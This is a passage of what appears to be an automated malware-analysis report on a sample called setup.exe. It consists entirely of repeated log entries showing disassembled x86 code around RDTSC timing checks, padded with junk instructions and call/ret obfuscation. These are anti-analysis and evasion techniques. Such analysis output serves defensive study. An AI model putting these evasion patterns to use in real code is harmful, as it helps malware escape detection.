Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E39C38 second address: E39C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E39C3C second address: E39C4A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E39C4A second address: E39C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3C698 second address: E3C69E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3C69E second address: E3C6A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3C6A2 second address: E3C6B6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007FF32CDD6566h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3E52B second address: E3E567 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FF32CFB71FEh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007FF32CFB7202h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 jnp 00007FF32CFB7202h 0x0000001e ja 00007FF32CFB71FCh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3E665 second address: E3E66A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3EA3D second address: E3EA43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3EA43 second address: E3EA47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3F0AE second address: E3F0B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3F0B7 second address: E3F0BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3F182 second address: E3F186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3F2EA second address: E3F2F4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3F5D3 second address: E3F5D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3F5D7 second address: E3F5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E3F5DD second address: E3F626 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FF32CFB71F8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 movsx esi, si 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 pushad 0x00000029 jmp 00007FF32CFB7206h 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 push eax 0x00000032 push edx 0x00000033 push edx 0x00000034 pop edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E41D07 second address: E41D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E42454 second address: E4245A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4245A second address: E42460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E42460 second address: E42464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E44280 second address: E44286 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E44286 second address: E44290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF32CFB71F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E44290 second address: E442F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007FF32CDD656Bh 0x00000010 jmp 00007FF32CDD6572h 0x00000015 pop edi 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+1246ED0Ch], ecx 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007FF32CDD6568h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 00000017h 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a mov dword ptr [ebp+122D1C24h], ebx 0x00000040 sub di, 5FBFh 0x00000045 xchg eax, ebx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push ebx 0x0000004a pop ebx 0x0000004b pushad 0x0000004c popad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E442F6 second address: E442FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E46012 second address: E46016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E49048 second address: E49050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4AC52 second address: E4AC6C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF32CDD656Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4AC6C second address: E4AD06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF32CFB7202h 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FF32CFB71F8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 call 00007FF32CFB7206h 0x0000002c sbb bx, 52BFh 0x00000031 pop edi 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+12460B16h], ebx 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push edx 0x0000003f call 00007FF32CFB71F8h 0x00000044 pop edx 0x00000045 mov dword ptr [esp+04h], edx 0x00000049 add dword ptr [esp+04h], 0000001Dh 0x00000051 inc edx 0x00000052 push edx 0x00000053 ret 0x00000054 pop edx 0x00000055 ret 0x00000056 jng 00007FF32CFB71F8h 0x0000005c mov bl, 0Dh 0x0000005e xchg eax, esi 0x0000005f push eax 0x00000060 push edx 0x00000061 jnl 00007FF32CFB71F8h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4DBB0 second address: E4DBB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4CDFA second address: E4CE01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4CF0B second address: E4CF11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4FCD6 second address: E4FCE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FF32CFB71F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4FCE0 second address: E4FD4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF32CDD6573h 0x0000000e nop 0x0000000f pushad 0x00000010 mov esi, 520426D3h 0x00000015 call 00007FF32CDD6573h 0x0000001a mov dword ptr [ebp+12460B16h], edi 0x00000020 pop ecx 0x00000021 popad 0x00000022 push 00000000h 0x00000024 mov dword ptr [ebp+124610CAh], edx 0x0000002a push 00000000h 0x0000002c jns 00007FF32CDD6566h 0x00000032 jnl 00007FF32CDD656Bh 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b jmp 00007FF32CDD6571h 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4FE41 second address: E4FE47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E4FE47 second address: E4FE51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF32CDD6566h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E51D05 second address: E51D13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FF32CFB71FCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E52E67 second address: E52E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF32CDD6574h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E52E82 second address: E52E86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E53F2D second address: E53F32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E53F32 second address: E53F38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E55005 second address: E55076 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 ja 00007FF32CDD6566h 0x0000000d pop eax 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FF32CDD6568h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e sub ebx, dword ptr [ebp+122D26A2h] 0x00000034 mov bx, B540h 0x00000038 push 00000000h 0x0000003a mov di, 2F00h 0x0000003e xchg eax, esi 0x0000003f jbe 00007FF32CDD6574h 0x00000045 push eax 0x00000046 jg 00007FF32CDD6581h 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FF32CDD656Fh 0x00000053 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E55076 second address: E5507A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E51F22 second address: E51FD4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CDD6576h 0x00000008 jmp 00007FF32CDD6570h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 cld 0x00000013 mov di, FC51h 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov edi, dword ptr [ebp+122D32D3h] 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007FF32CDD6568h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000014h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 call 00007FF32CDD656Fh 0x0000004a mov ebx, dword ptr [ebp+122D30C0h] 0x00000050 pop edi 0x00000051 mov eax, dword ptr [ebp+122D0F39h] 0x00000057 push 00000000h 0x00000059 push edi 0x0000005a call 00007FF32CDD6568h 0x0000005f pop edi 0x00000060 mov dword ptr [esp+04h], edi 0x00000064 add dword ptr [esp+04h], 0000001Ch 0x0000006c inc edi 0x0000006d push edi 0x0000006e ret 0x0000006f pop edi 0x00000070 ret 0x00000071 mov bx, dx 0x00000074 push FFFFFFFFh 0x00000076 je 00007FF32CDD656Ch 0x0000007c sub ebx, dword ptr [ebp+122D2BBFh] 0x00000082 nop 0x00000083 push eax 0x00000084 push edx 0x00000085 jmp 00007FF32CDD656Ch 0x0000008a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E56033 second address: E56038 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E56038 second address: E56091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FF32CDD6566h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FF32CDD6568h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 push 00000000h 0x0000002a adc di, 19A0h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007FF32CDD6568h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b xchg eax, esi 0x0000004c push ecx 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: E5526D second address: E55271 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA2DF0 second address: EA2DF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA2FAE second address: EA2FB8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CDD656Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA33C0 second address: EA33C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA33C4 second address: EA33E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF32CDD6571h 0x0000000d js 00007FF32CDD6566h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA33E3 second address: EA33F4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ebx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA33F4 second address: EA3412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6578h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA3412 second address: EA3423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF32CFB71FAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA36C9 second address: EA36CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA36CD second address: EA36EE instructions: 0x00000000 rdtsc 0x00000002 js 00007FF32CFB71F6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jmp 00007FF32CFB7203h 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA36EE second address: EA36F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA36F5 second address: EA3718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB71FDh 0x00000009 jne 00007FF32CFB71F6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edi 0x00000013 jl 00007FF32CFB71FEh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA3F66 second address: EA3F9D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF32CDD6568h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jng 00007FF32CDD6566h 0x00000015 jmp 00007FF32CDD656Eh 0x0000001a push eax 0x0000001b pop eax 0x0000001c popad 0x0000001d jmp 00007FF32CDD6571h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA4810 second address: EA4820 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FF32CFB71FAh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA4820 second address: EA4838 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF32CDD6568h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jne 00007FF32CDD6566h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA4838 second address: EA484A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CFB71FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA484A second address: EA484E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA484E second address: EA485A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FF32CFB71F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA9AD0 second address: EA9ADD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA9ADD second address: EA9B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7202h 0x00000009 popad 0x0000000a push ebx 0x0000000b jmp 00007FF32CFB71FDh 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EA9B07 second address: EA9B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EAA024 second address: EAA028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EAA1C6 second address: EAA1D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FF32CDD6566h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EAA1D2 second address: EAA1D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EAA1D6 second address: EAA1DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EAA4AA second address: EAA4AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: DF8E2D second address: DF8E45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF32CDD6570h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: DF8E45 second address: DF8E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FF32CFB71F6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EB31F7 second address: EB3212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CDD6577h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EBB976 second address: EBB98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FF32CFB71FCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EBB98F second address: EBB995 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EB9C41 second address: EB9C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FF32CFB71F8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EB9C51 second address: EB9C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF32CDD6578h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EB9C6F second address: EB9C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EB9C73 second address: EB9C7C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EBA46B second address: EBA48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF32CFB7208h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EBA48E second address: EBA492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EBA79F second address: EBA7A5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: EBA8FA second address: EBA919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007FF32CDD6572h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
